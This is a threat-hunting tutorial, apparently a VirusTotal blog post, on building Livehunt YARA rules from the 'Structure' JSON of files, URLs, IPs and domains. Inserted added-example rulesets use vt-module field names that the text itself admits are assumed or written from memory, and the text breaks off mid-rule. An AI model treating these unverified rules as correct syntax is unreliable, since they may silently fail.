<div class="interval_12"> We hope you find this useful, and as always we are happy to <a href="https://www.virustotal.com/gui/contact-us/other" target="_blank">hear</a> any ideas or feedback you would like to share. Happy hunting!
</div>
<div class="interval_12"> <b>References that could be interesting</b></div>
<div class="interval_12">
<ul>
<li>IP address search modifiers: <a href="https://developers.virustotal.com/docs/ip-address-search-modifiers" target="_blank">https://developers.virustotal.com/docs/ip-address-search-modifiers</a></li>
<li>Domain search modifiers: <a href="https://developers.virustotal.com/docs/domain-search-modifiers" target="_blank">https://developers.virustotal.com/docs/domain-search-modifiers</a></li>
<li>File search modifiers: <a href="https://developers.virustotal.com/docs/file-search-modifiers" target="_blank">https://developers.virustotal.com/docs/file-search-modifiers</a></li>
<li>Network hunting: Writing YARA rules for Livehunt: <a href="https://developers.virustotal.com/docs/nethunt" target="_blank">https://developers.virustotal.com/docs/nethunt</a></li>
<li>File hunting: Writing YARA rules for Livehunt: <a href="https://developers.virustotal.com/docs/writing-yara-rules-for-livehunt" target="_blank">https://developers.virustotal.com/docs/writing-yara-rules-for-livehunt</a> </li>
</ul>
</div>
<style>
.my-code{
font-family: "Courier", sans-serif;
font-size: medium;
width: 100%;
background: Black;
color: White;
/*padding: 24px;*/
border-collapse: collapse;
}
.my-yara-code{
font-family: "Courier", sans-serif;
font-size: medium;
width: 100%;
background: #F7F9F9;
color: Black;
/*padding: 24px;*/
border-collapse: collapse;
}
mark.green {
color:#3cb371;
background: none;
}
mark.gray {
color:Gray;
background: none;
}
mark.yellow {
color:Yellow;
background: none;
}
mark.orange {
color:Orange;
background: none;
}
mark.red {
color:Red;
background: none;
}
mark.blue {
color:#33BEFF;
background: none;
}
mark.dark-blue {
color:Blue;
background: none;
}
.table-container {
/*padding: 32px;*/
font-family: "Courier", sans-serif;
font-size: medium;
}
.table-container table {
width: 100%;
background: #fff;
color: #222;
/*padding: 24px;*/
border-collapse: collapse;
}
.table-container table th {
font-weight: bold!important;
text-transform: none!important;
}
th:first-child { width: 24%; }
th:first-child+th { width: 39%; }
/*
.table-container table td,
.table-container table th {
padding: 16px 32px;
}
*/
.table-container table tr {
border-bottom: 1px solid #eee;
}
@media (max-width: 580px) {
.table-container table thead {
display: none;
}
.table-container table td {
display: block;
}
}
a {
color: blue!important;
}
.central_img {
position: relative;
display: block;
margin-left: auto;
margin-right: auto;
}
.central_img img {
border: 1px solid #000000;
}
.central_img p {
text-align: center;
font-style: italic;
}
.width_10 {
width: 10%;
}
.width_15 {
width: 15%;
}
.width_20 {
width: 20%;
}
.width_30 {
width: 30%;
}
.width_40 {
width: 40%;
}
.width_50 {
width: 50%;
}
.width_60 {
width: 60%;
}
.width_80 {
width: 80%;
}
.width_90 {
width: 90%;
}
.width_100 {
width: 100%;
}
ul{
margin-bottom: 5px!important;
}
.interval_12{
margin-bottom: 12px!important;
}
</style>
<div class="interval_12">Joseliyo Sánchez (http://www.blogger.com/profile/15205592295367780978)</div>
<div class="interval_12">2023-09-21: It's all about the structure! Creating YARA rules by clicking</div>
<div class="interval_12">Since we made our (extended) vt module available for LiveHunt YARA rules we understand it is not easy for analysts to keep in mind all the new potential possibilities - too many of them! Our goal is to make YARA rule creation as easy as possible while providing security experts everything they need to make even more powerful rules. Our recently published new <a href="https://blog.virustotal.com/2023/07/actionable-threat-intel-iii-introducing.html" target="_blank">YARA editor</a>, which incorporates full syntax coloring and auto-complete while you develop your rule, is a first step.</div>
<div class="interval_12">However, we wanted to go further. We already discussed how you can use predefined templates (additionally you can check our <a href="https://www.brighttalk.com/webcast/18282/592177" target="_blank">Threat Hunting with VirusTotal - Episode 4</a> for further examples and ideas), but in this post we want to focus on a terrific new feature when creating rules using the “Structure” of any given object (file, URL, domain or IP).</div><div class="central_img width_90 interval_12"><span id="docs-internal-guid-16a72d11-7fff-d1bc-f56f-39c4d2fa8a4e"><span face="Arial, sans-serif" style="font-size: 11pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space-collapse: preserve;"><span style="border: none; display: inline-block; height: 108px; overflow: hidden; width: 624px;"><img height="108" src="https://lh5.googleusercontent.com/Sg0qEdvDF2vwl6sf4ln1nudJ-DDrqtjM2PLVnfFi11VRt8LdbIFRp3FjI-Vzq-Vvw5UWcs1gQTdGc5255yw-rVDTNuEo3VLaAw5WN3oGzSh8KZ6y23QVpcAwomwziXkolm4mS1kNf_-j3TxEDYMzmLU0KO5Y4isdAHy9Jv5KLKph0aKSD3OUWPQh6zOhGK9v6iH2PKVqiUGX1ppR1hQqa60VdO5PjozbcfpDYg" style="margin-left: 0px; margin-top: 0px;" width="850" /></span></span></span></div>
<div class="interval_12">“Structure” provides the full JSON containing all details VirusTotal knows for any given indicator. For instance, you can paste a file hash and you will get full details about its behaviour and metadata. Better still, you can simply click on any field you are interested in and it will automatically be included in a fresh new YARA rule in the editor - no need to remember how to get that particular field in the VT module anymore.</div><div class="central_img width_90 interval_12"><span id="docs-internal-guid-e94c91ac-7fff-c584-dcf4-ea6f2a29bc52"><span face="Arial, sans-serif" style="font-size: 11pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space-collapse: preserve;"><span style="border: none; display: inline-block; height: 324px; overflow: hidden; width: 624px;"><img height="324" src="https://lh4.googleusercontent.com/T-_k4syXLVlpraeTk6XUyGO30uHhreoiup0fjVujwLy0R-2YN_XYcS59TD5gcuXBHEB8GHDILPs6UqbJKMJSq6AS8s70ueuJNuRMM4vxiRDS0GGtqyUzAhYRQuN1Zavn9YlBuwO_aEKbqXjTJ-LmZH03FIVAaqR6x5KWCwqI4Ye4WYdfmbzUFayZbJ9D42mXqFD0hLcMyUbf8j0dwNiD_g5ZYgVMMqftJVopWQ" style="margin-left: 0px; margin-top: 0px;" width="860" /></span></span></span></div>
<div class="interval_12">In case you are wondering, this also deals with all kinds of loops. If any of the selected fields needs to be iterated, the correct syntax will automatically be added to your rule.</div>
<div class="interval_12">Let’s check the different object types.</div>
<br />
<h2 style="text-align: left;">Files</h2>
<div class="interval_12">For a file object you will find two different branches in the resulting JSON - behaviour and metadata.</div>
<div class="interval_12">The behaviour key is based on the sample execution in the sandbox. For example, you can create rules based on files written by the malware, files dropped, mutexes created, processes created, sigma results or ATT&CK MITRE results, among others.</div><div class="central_img width_90 interval_12"><span id="docs-internal-guid-a83c0bac-7fff-00d1-2fb8-771f6af11823"><span face="Arial, sans-serif" style="font-size: 11pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space-collapse: preserve;"><span style="border: none; display: inline-block; height: 440px; overflow: hidden; width: 467px;"><img height="440" src="https://lh6.googleusercontent.com/Aadi_xwtlxdw-3ZxJKgi17ihkyBKdFXjVZTtE7Hcn0M5YkpxwGg3PDH1Oq9i45GagvY_SoiMrOoSHes6gIxg6fZJepDrPZUGh30_dwSiAD9w1imZQYcXLiT4JRWE5YDO82mw7uJoOg_HV7VGYPqQIX6xEXCT6ihlO6J0OKMiGaQRj3rqHnwfOnbOtkJHmgwaMoEe4XkQ8prh_9r6UnxqdedAGpKuv7dyt7eKTQ" style="margin-left: 0px; margin-top: 0px;" width="800" /></span></span></span></div>
<div class="interval_12">Let’s suppose that we are interested in creating a new detection logic focused on some specific file written. In that case, we want to open the files_written section and then click on the file that we have observed as suspicious for our rule. Automatically, a new rule pops up with that condition (note that the loop condition was conveniently created for us too).
</div><div class="central_img width_90 interval_12"><span id="docs-internal-guid-8f4dc5a7-7fff-5d29-a6b8-9b47b1a339e1"><span face="Arial, sans-serif" style="font-size: 11pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space-collapse: preserve;"><span style="border: none; display: inline-block; height: 163px; overflow: hidden; width: 624px;"><img height="163" src="https://lh3.googleusercontent.com/aGG5LFzc2uxxSeJi_Eq8Z_olsA8BAo7D4m9RJDKUdCWBeiAev__HZ7IJCwcstA2ui_EnK1Eqx2aWc-WTPNzQ6nLPDA5RbrvI49xUnZ4PJivME1Z_XrYzbv-wMTN16YZaDeScRTvop5yR-3nb_9oWTdP_5imGrE349jF3Vp_G73UeJenA8JT7nC0wSlggqqN4gFpvnOOBopMYME2LaiiNBZzcon2K-v_ovZf5SA" style="margin-left: 0px; margin-top: 0px;" width="850" /></span></span></span></div>
<div class="interval_12">We can keep editing the rule to adapt it to our needs, like adding additional conditions to detect a specific string or path, another file name, etc.
</div>
<div class="interval_12">If your security posture takes the ATT&CK MITRE matrix into account, you may want to add these fields to your logic; they are available under the mitre_attack_techniques key.
</div>
<div class="central_img width_90 interval_12"><span id="docs-internal-guid-21187764-7fff-8c7c-f602-2898146cfa09"><span face="Arial, sans-serif" style="font-size: 11pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space-collapse: preserve;"><span style="border: none; display: inline-block; height: 205px; overflow: hidden; width: 624px;"><img height="205" src="https://lh6.googleusercontent.com/DEUjwjL60JNkztBxOE2NeUpX0DiWvd0L3CPvLOngjqFhUeEH21X9BV-INbhsVRwymRrQ6jH2RqXW9qmx6DSs1UaX_We8ETC1clflt-ifO-RZ60ScVBWnrvkSwVu2UZe3h6HJte1gdtwp-ia9QvNlGLmAYp_RQ6jH0358XM1MpCZXWwy0WBGk27PUy_YoUsWp93pR592hk5i18hVAl_J7t3GzgAhwTz6XoDMwBw" style="margin-left: 0px; margin-top: 0px;" width="850" /></span></span></span></div><div class="interval_12">In addition to vt.behaviour, it is also possible to use vt.metadata to create a rule based on file metadata. Under the metadata key, we have a lot of interesting information that we can use to create our rule.
</div>
<div class="central_img width_90 interval_12"><span id="docs-internal-guid-c99a9f13-7fff-f4fd-2edf-aa895bb8f9b8"><span face="Arial, sans-serif" style="font-size: 11pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space-collapse: preserve;"><span style="border: none; display: inline-block; height: 531px; overflow: hidden; width: 416px;"><img height="531" src="https://lh5.googleusercontent.com/Pd-knfBDuBT8FSyqnNwJ_aUxGJWijLBgx9N4c9xbocxzwXkYfuTs0FkaL79J8pa-DMfkYnAikXOwM3VDF8DgNZdsV2Xxvm_SFegXus5-Qti1lsFLo08PGkFhGlt7Piq2y_7qP_rIzvTwuS1jf4Y-jPv1y5tKOQ00J6GgRYqJmLIN3OSs1UFFa1eq5PafI1HqR0nbIJ1YUbsSyln7JFNPOtHx_e8xYmTh8689RA" style="margin-left: 0px; margin-top: 0px;" width="700" /></span></span></span></div><div class="interval_12">Probably one of the most interesting fields is "itw". Under this key we can create rules based on in-the-wild (ITW) communications we are interested in detecting, whether they relate to IPs, domains or URLs.</div>
<div class="interval_12">For example, we may be interested in files that were downloaded ITW with response code 200 from the Discord CDN, and that are binaries, more specifically DLLs.
</div>
<div class="central_img width_90 interval_12"><span id="docs-internal-guid-c54e468d-7fff-2adc-ef58-58883f9ed97e"><span face="Arial, sans-serif" style="font-size: 11pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space-collapse: preserve;"><span style="border: none; display: inline-block; height: 131px; overflow: hidden; width: 624px;"><img height="131" src="https://lh4.googleusercontent.com/Ubl-9sQaA_6i9UEuhJhMPpylHyfE4fnMSh9jxEhq_G1NBDVA1kVG-YvNn_EzMCaerTnfF4a6bBtUFem8zdWF1YPfBYmGTa128mim7EqH24FYZy9TK42eier50bj_t7-nwfOyeLc4i0iVR_MNoUG_U4Ta14gzXQJwUsmOWVO-Be-zeK4DZafgLrEiKiImxUM4jxXmFVF788Zs-5pf48jyuvF25hiqYNnHd3lWWA" style="margin-left: 0px; margin-top: 0px;" width="800" /></span></span></span></div><div class="interval_12">Another interesting approach could be to hunt for files that are downloaded ITW, but with characteristics that could interest us in the whois of the domain from which it was downloaded. This could be interesting if we are monitoring certain domains that are being registered.
</div>
<div class="central_img width_90 interval_12"><span id="docs-internal-guid-d8e9cf76-7fff-5593-889a-adde74f3522a"><span face="Arial, sans-serif" style="font-size: 11pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space-collapse: preserve;"><span style="border: none; display: inline-block; height: 135px; overflow: hidden; width: 624px;"><img height="135" src="https://lh4.googleusercontent.com/RCOnZxKoLY3_5a0qs2u5--1a3eOeNf0dM8tlEAPCafnIxrR2MINN9gVlH3ioN8GU2DdF-SqxGl18EjtnLaYIobWSHRHubPvKdZ9YgQ32tFKW52QPD7YzNDCUKk8zcCmJAx8Mn7rJQ1-rVS6Xike8ujgl0AwHb4r4C1vPtdBILtLrZcipDGHNpiy9EThTnX1ARzmXQQDGxbLzN78aNmOFWPbnRoje8WTApntdAw" style="margin-left: 0px; margin-top: 0px;" width="800" /></span></span></span></div><div class="interval_12">Metadata gives us many ways to build Livehunt rules: from more complex rules that filter ITW activity by domain, IP or URL, to simpler ones that use ExifTool output, submitter information, fuzzy hashes and so on.
</div>
<div class="interval_12">Combining metadata and behaviour conditions with the usual content patterns results in a much more precise YARA rule.
</div>
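<div class="interval_12">The ruleset below is an added example written for this post, not one of the rules shown in the screenshots above. It combines the ITW conditions just described (Discord CDN, HTTP 200, DLL) with a behaviour condition so that the three groups of the rule can be loosened independently. The field names under vt.metadata.itw and vt.behaviour are written from memory of the vt module; vt.metadata.itw.url.response_code in particular is an assumption, so confirm each name in the Structure panel before deploying.</div>

```yara
import "vt"

// Added example (not from the VirusTotal post): PE DLLs first seen being
// downloaded in the wild from the Discord CDN with an HTTP 200 response,
// that also drop a PE file on disk when detonated in the sandbox.
rule itw_discord_cdn_dll
{
  meta:
    description = "New PE DLL downloaded ITW from cdn.discordapp.com that drops an executable"
    author = "added example, not from the VirusTotal post"

  condition:
    // identity: only files VirusTotal has not seen before, and only DLLs
    vt.metadata.new_file and
    vt.metadata.file_type == vt.FileType.PE_DLL and

    // ITW source: the Discord attachment CDN
    vt.metadata.itw.domain.raw iequals "cdn.discordapp.com" and
    vt.metadata.itw.url.raw icontains "/attachments/" and
    // HTTP response code of the ITW download (assumed field name; verify in Structure)
    vt.metadata.itw.url.response_code == 200 and

    // behaviour: the sandbox saw the DLL drop a PE on disk
    for any dropped in vt.behaviour.files_dropped : (
      dropped.path iendswith ".exe" or dropped.path iendswith ".dll"
    )
}
```

<div class="interval_12">Deploy it as a file Livehunt ruleset. Each of the three groups (identity, ITW, behaviour) can be removed on its own to widen the net, which is usually how a rule like this is tuned: start broad on the ITW conditions, then add behaviour once the volume of notifications is known.</div>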
<br />
<h2 style="text-align: left;">URL</h2>
<div class="interval_12">For URLs, under the “net” section in the VT module, you can use the keys url, ip and domain as shown in the <a href="https://developers.virustotal.com/docs/nethunt" target="_blank">Netloc summary table</a>. Any field available under these keys can be used in your URL hunting rule: the ip and domain keys describe the IP the URL resolves to and the URL’s own domain, so a single URL rule can combine conditions on all three.
</div>
<div class="central_img width_90 interval_12"><span id="docs-internal-guid-f5c41466-7fff-8c2f-b562-9a0a04d9b668"><span face="Arial, sans-serif" style="font-size: 11pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space-collapse: preserve;"><span style="border: none; display: inline-block; height: 456px; overflow: hidden; width: 623px;"><img height="456" src="https://lh4.googleusercontent.com/Lz8MrSug-c9z0R4dr1bDhPKA6dy0EX-FkaxxH0b6Xzn8_bBBj7mVrfvhetLg4GAZY0-2IUDaWln1syapaYeLyAdvkNE6OMfUbyzRriP_1uYzLJA1JFacd6t2_kBcz6z6JLWVg2-blDAYQRjwrepeNmyi25XeXCex5qwvO4Dl1qELvXlEoSL8q6kWdgV9U-Pv0kFODLAoWQUyAjavJ3A2zAyPyuxnnDSXtHnYqQ" style="margin-left: 0px; margin-top: 0px;" width="800" /></span></span></span></div><div class="interval_12">Some of the features you can use to create your rule include URL response headers, downloaded and communicating files, URL path, domain whois, IP ASN, among others. Just by clicking on the fields you are interested in and adapting them to your needs, you can create a robust rule that helps you follow a campaign you are interested in investigating.
</div>
<div class="central_img width_90 interval_12"><span id="docs-internal-guid-c953768a-7fff-547d-a3b7-581c5ea84fbb"><span face="Arial, sans-serif" style="font-size: 11pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space-collapse: preserve;"><span style="border: none; display: inline-block; height: 260px; overflow: hidden; width: 624px;"><img height="260" src="https://lh5.googleusercontent.com/8fxAoknccU5clqmIrv3BeWQ170V4EoHRZMq6LiV-12br4DGXUsdsODSJvHOuGQ_C1R9iufpfFmwzSHPMUpjsRey2ja4N0GOZ3w-mfnNN9H2xmaUzoxkC9f0TO5gLh1zZMBL7iijjNVgF7T-rRzegdjJ0IHLKzzhG1_uOzfRULqrk7BKx9Pb7gvBsTDxRraZsN2DnOD2GMhXYS1WcB54x3WGoZAcQENazu10o7w" style="margin-left: 0px; margin-top: 0px;" width="800" /></span></span></span></div><div class="interval_12">A use case: we want to discover new URLs seen in VirusTotal whose path matches a certain pattern, that resolve to a certain network block, and whose domain was registered through a registrar commonly used to register malicious domains. Finally, to avoid noise, we only want URLs that are new to VirusTotal.
</div><div class="central_img width_90 interval_12"><span id="docs-internal-guid-57e45877-7fff-86a3-048f-2faab961c081"><span face="Arial, sans-serif" style="font-size: 11pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space-collapse: preserve;"><span style="border: none; display: inline-block; height: 228px; overflow: hidden; width: 624px;"><img height="228" src="https://lh5.googleusercontent.com/vajQWvKUhAIcpa_mkPSWw5SX_EBK-KM6hptmbRs8pxm0tuj0S63kXXqOz9DInlAXNh2I76ox6h4fy3ImbJ2qoN144qCo7wDMAQWfRFcIEMQ6U0UQyPkCP1mAnajVpcP2VY44-uymXptiaYuQ6UP-KsMAn3H5FLmcsCtYX_mZKFGiT1ALBcdmSuu2FWd0IX-9S40rXkB8Al0v9Vw3N0TTTweE0N7m95QakMRyfg" style="margin-left: 0px; margin-top: 0px;" width="800" /></span></span></span></div>
<div class="interval_12">The last rule matches, for example, a URL used by the Gamaredon threat actor.
</div>
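<div class="interval_12">The rule below is an added example for the URL use case above, not the rule in the screenshot. It takes the four conditions from the description: a newly seen URL, a path pattern, a resolved IP inside a netblock, and a registrar in the domain WHOIS. The netblock 203.0.113.0/24 (a documentation range) and the registrar string are placeholders to be replaced with real values; vt.net.url.path and vt.net.domain.whois are assumed field names to confirm against the Netloc summary table or the Structure panel.</div>

```yara
import "vt"

// Added example (not from the VirusTotal post): newly seen URLs whose path
// looks like /<hexdir>/<name>.exe, resolving into a watched /24 and whose
// domain was registered through a watched registrar.
rule new_url_hexpath_netblock_registrar
{
  meta:
    description = "New URL: hex directory + executable path, resolves into 203.0.113.0/24, registrar of interest"
    author = "added example, not from the VirusTotal post"

  condition:
    // avoid noise from rescans of URLs VirusTotal already knows
    vt.net.url.new_url and

    // path pattern: /<8 or more hex chars>/<file>.exe|dll|msi (assumed field: url.path)
    vt.net.url.path matches /^\/[0-9a-f]{8,}\/[^\/]+\.(exe|dll|msi)$/i and

    // resolved IP inside 203.0.113.0/24 (placeholder block) as an integer interval:
    // 203.0.113.0 = 3405803776, 203.0.113.255 = 3405804031
    vt.net.ip.ip_as_int >= 3405803776 and
    vt.net.ip.ip_as_int <= 3405804031 and

    // registrar taken from the raw WHOIS text of the URL's domain
    // (placeholder registrar; assumed field: domain.whois)
    vt.net.domain.whois icontains "Registrar: Example Registrar, Inc."
}
```

<div class="interval_12">The integer interval is the same trick the network range helper in the documentation produces: convert the first and last address of the block to 32-bit integers and compare vt.net.ip.ip_as_int against both bounds. Keep new_url as the first condition; it is the cheapest to evaluate and removes most of the noise.</div>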
<br />
<h2 style="text-align: left;">IP</h2>
<div class="interval_12">The fields available for the IP entity can be found under the ip key in vt.net. Here you can use fields such as the IP WHOIS, communicating files, netblocks and others.
</div><div class="central_img width_90 interval_12"><span id="docs-internal-guid-9b40206c-7fff-0908-82a3-d01c342a54fd"><span face="Arial, sans-serif" style="font-size: 11pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space-collapse: preserve;"><span style="border: none; display: inline-block; height: 340px; overflow: hidden; width: 310px;"><img height="340" src="https://lh3.googleusercontent.com/CfZSqZYggvPBNe2Ws1Kanjg-lpQUNnUv8cXKisW-1JEkm7REyj8jVXkifKUB9T7YeW5FJL5v0xr1e10PXWGca5xBJ-VxOjU4uU1QW5pyRm2mw95hIBx2UzOzWpqenBwtuvLcfq1sHHdYCJ7DqeCi4BHEfV6n5QPBz1BiwpBClZhRXGtkmvxYDYkPAUZ9bJdt_Ej1B6hc7dNSuoeAohk5PQsnQMjoz-WVN-4E4A" style="margin-left: 0px; margin-top: 0px;" width="600" /></span></span></span></div>
<div class="interval_12">From here, we can add as many conditions as we need to identify new IP addresses belonging to suspicious campaigns. The following image is the result of a few clicks on fields of a specific IP address report.
</div><div class="central_img width_90 interval_12"><span id="docs-internal-guid-22d523ac-7fff-fb5e-4e59-8397baffff74"><span face="Arial, sans-serif" style="font-size: 11pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space-collapse: preserve;"><span style="border: none; display: inline-block; height: 465px; overflow: hidden; width: 624px;"><img height="465" src="https://lh3.googleusercontent.com/DzNuWJ4Q9hUN6ViZRuOeC0kITZg8TTvxfPshsJB3PkQFV-zhe5rnylAwAnibW7GzF4tQ6R-Z9CSPPhMoesToPVEvs7Wrvso-lAqCst9QCvnb4H8u_K62yip3b8kx4heB2bywxv0SwGqFnly9nHHXibH1DcrO644NFp2YHlMO1V0QzknXmOvOFlkapvNHa4F4s1pyozfwlG3kEeCczeAJ1lCA60Np4LsdupKzwA" style="margin-left: 0px; margin-top: 0px;" width="800" /></span></span></span></div>
<div class="interval_12">Let’s suppose we want to identify new IP addresses that belong to a certain ASN or network range (<a href="https://developers.virustotal.com/docs#network-range-helper" target="_blank">here we explain</a> how to express a network range as an integer interval) and that communicate with PE EXE binaries.
</div>
<div class="central_img width_90 interval_12"><span id="docs-internal-guid-23b8ba4a-7fff-25b8-9e59-bb034cef2152"><span face="Arial, sans-serif" style="font-size: 11pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space-collapse: preserve;"><span style="border: none; display: inline-block; height: 219px; overflow: hidden; width: 624px;"><img height="219" src="https://lh6.googleusercontent.com/8EpmHtvDujREGrHsTE-tZPZgiBukSmlOV0oa0KrIF1SxRvqnEEhFXoeqji2ciL50qgW3UyQiipYr48nzWBRcKE2UICfvazQbIrBKswHzb8U-fHYaBhkIF0MqLKmvVmTQuWQOxNeP2e8GXXwyolmhUb6Pgr3M8-DgBhPUS9WUuCEZu4A3pOoPZIFtKM-hGlreu1pr4wCRkOVWLKDAwsvDgacw2KCJ_DZCIZ2DuA" style="margin-left: 0px; margin-top: 0px;" width="800" /></span></span></span></div><div class="interval_12">This use case can also be turned around to monitor network ranges belonging to our organization or customers, alerting when a new IP address in those ranges is contacted by any file.
</div>
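<div class="interval_12">The rule below is an added example serving both the ASN/range use case and the “watch our own ranges” note above; it is not the rule from the screenshot. The range 198.51.100.0/24 (a documentation range) and the AS owner string are placeholders. ip_as_int follows the linked network range helper; as_owner and the fields under communicating_file are assumed names to verify in the Structure panel.</div>

```yara
import "vt"

// Added example (not from the VirusTotal post): a new IP address inside a
// watched network range that at least one PE EXE in VirusTotal has been
// observed communicating with.
rule new_ip_in_range_with_peexe_comms
{
  meta:
    description = "New IP in 198.51.100.0/24 contacted by a PE EXE"
    author = "added example, not from the VirusTotal post"

  condition:
    vt.net.ip.new_ip and

    // 198.51.100.0/24 as an integer interval (placeholder range):
    // 198.51.100.0 = 3325256704, 198.51.100.255 = 3325256959
    vt.net.ip.ip_as_int >= 3325256704 and
    vt.net.ip.ip_as_int <= 3325256959 and

    // optionally pin the AS owner as well (placeholder; assumed field: ip.as_owner)
    vt.net.ip.as_owner icontains "Example Networks" and

    // a PE EXE communicates with this IP (assumed names under ip.communicating_file)
    vt.net.ip.communicating_file.file_type == vt.FileType.PE_EXE and
    vt.net.ip.communicating_file.analysis_stats.malicious >= 3
}
```

<div class="interval_12">To use the same rule for your own address space, set the interval to your netblock and drop the as_owner and malicious-count conditions: any file, detected or not, that contacts a previously unseen IP in that range will then raise a notification, which is exactly the signal you want for infrastructure you own.</div>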
<br />
<h2 style="text-align: left;">Domain</h2>
<div class="interval_12">Last but not least, we can also use the new Structure functionality with domains. In this case, the domain entity includes information about both the domain itself and the IP address it resolves to.
</div>
<div class="central_img width_90 interval_12"><span id="docs-internal-guid-7b43c8cd-7fff-4fb3-0fa6-c7d1c4484707"><span face="Arial, sans-serif" style="font-size: 11pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space-collapse: preserve;"><span style="border: none; display: inline-block; height: 359px; overflow: hidden; width: 303px;"><img height="359" src="https://lh4.googleusercontent.com/K-ACzp6Pi5b9GuLed-dC89c2ehUGiihuq-JFOXilTCtKKDEGlOsuT7cKId3kCYZH8ZuNU8dzfYrmbv5KophjIrz8NFOyfoFtWJHs5BvdUOd3j_xn_vOCtE-Cftz3nWe-41sqN_7TxNy7ClokN0Pc3UJnJtL3aC4wWkXy68qetpqrgmsqxkto5-8R64QR_ULvcw5GX-lIyG1AHrfg_tt7Bydh_NSUIK1xYzYYxA" style="margin-left: 0px; margin-top: 0px;" width="600" /></span></span></span></div><div class="interval_12">The process is the same as for the other entities: click on the fields of interest and shape the rule.
</div>
<div class="central_img width_90 interval_12"><span id="docs-internal-guid-3fc43b7b-7fff-8141-a257-f62375c942e7"><span face="Arial, sans-serif" style="font-size: 11pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space-collapse: preserve;"><span style="border: none; display: inline-block; height: 243px; overflow: hidden; width: 624px;"><img height="243" src="https://lh5.googleusercontent.com/XAZiAa7j_TjMnsLwHgWVGXJ-5bjgF5YXo-1D2zboOWOcJXfVEP76pvH-V_TvHQR61i-PExF0yIu1Zm33mV37hzxbop702HMVFzWqJrI6CncvK-AJCbNb6au47VsZTHySluknVAtsJthsMYlfBYJaCuOe2Gne0ud-f7s0Rotm59EwjhsWY-XzHIilsgCZdaGxRQF0aFkkrwDZiQ4vfjbxBAUTF5NCURCavKLlBw" style="margin-left: 0px; margin-top: 0px;" width="800" /></span></span></span></div><div class="interval_12">Among the domain information there is an interesting field called categories, which holds the classifications assigned by different vendors. With it we can identify domains linked to malware, phishing, spyware and so on.
</div>
<div class="interval_12">As a use case for this field, let's say we want to discover new domains categorized as phishing whose HTTPS certificate has a not_before value later than a specific date, so that we only see certificates issued after that date.
</div>
<div class="central_img width_90 interval_12"><span id="docs-internal-guid-26e28d4b-7fff-a3a3-1bfd-6a03f546ed6c"><span face="Arial, sans-serif" style="font-size: 11pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space-collapse: preserve;"><span style="border: none; display: inline-block; height: 155px; overflow: hidden; width: 624px;"><img height="155" src="https://lh6.googleusercontent.com/gN1o6qlST9Kff046fr0r5BnjGMhGtAPI_yFhGrjxV4AVJ3HwveTOGLXuqUbvFjjl7ox2ZicoEVC_jNFIXfDO64yo4UNihxiqy_qGj58kMh_raVMlgeRF7Jha_vas-bJIhwN98Q1p_ldwWxcwBlsl8nCoMc4c6KYRmLFBeQNp6o_QLJCiJsC1HlXb_4jO9HezlA7iXTawpa4_7l3YKWewXgGbupLSTMbYATZg" style="margin-left: 0px; margin-top: 0px;" width="800" /></span></span></span></div><div class="interval_12">Another phishing-related case is to monitor a specific favicon that reuses our brand image. We can additionally require a pattern in the domain name or in the certificate’s subject alternative names to narrow the matches to lookalike domains.
</div>
<div class="central_img width_90 interval_12"><span id="docs-internal-guid-3c774a84-7fff-d30a-6b3b-ecab3d16414b"><div style="text-align: center;"><img height="152" src="https://lh4.googleusercontent.com/6Pt9bL9gvppoliaUkn2Z0EK1UV51Hzt_qbRZznMpvj8NkVlwIbWlvOku76nmH6zmZRnpW-h6zAd4zkXg-dej2pdNDYvDfYvLdkP84el_MN9qpM-wSLd-BFJgpQYXLZ8koFJRQztjezxRxF2rdGt4x4WyDrxQdDLEv1jj-RSndkE3u1L1NLrg3nzcRzNjKdKkU974DJ2Z-X8zMW6tgzX5Ip95LohyxiDasLRIAQ" style="font-family: Arial, sans-serif; font-size: 11pt; margin-left: 0px; margin-top: 0px; white-space-collapse: preserve;" width="800" /></div></span></div>
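<div class="interval_12">The ruleset below is an added example covering the two domain use cases above (phishing category plus certificate not_before, and brand favicon plus name pattern or SAN); it is not the content of the screenshots. The favicon dhash and the brand string are placeholders. Treating categories as a vendor-to-category dictionary, https_certificate.validity.not_before as a UNIX timestamp, and the paths favicon.dhash and https_certificate.extensions.subject_alternative_name are assumptions about how the Structure panel exposes the domain object; check the panel and adjust the names and the comparison type if it shows a string instead of an integer.</div>

```yara
import "vt"

// Added example 1 (not from the VirusTotal post): newly seen domains that some
// vendor categorises as phishing and whose TLS certificate was issued after
// 2024-01-01.
rule new_phishing_domain_recent_cert
{
  meta:
    description = "New domain, phishing category, certificate not_before after 2024-01-01"
    author = "added example, not from the VirusTotal post"

  condition:
    vt.net.domain.new_domain and

    // categories is assumed to be a vendor -> category dictionary
    for any vendor, category in vt.net.domain.categories : (
      category icontains "phishing"
    ) and

    // not_before assumed to be a UNIX timestamp; 1704067200 = 2024-01-01 00:00:00 UTC
    vt.net.domain.https_certificate.validity.not_before > 1704067200
}

// Added example 2 (not from the VirusTotal post): lookalike domains reusing our
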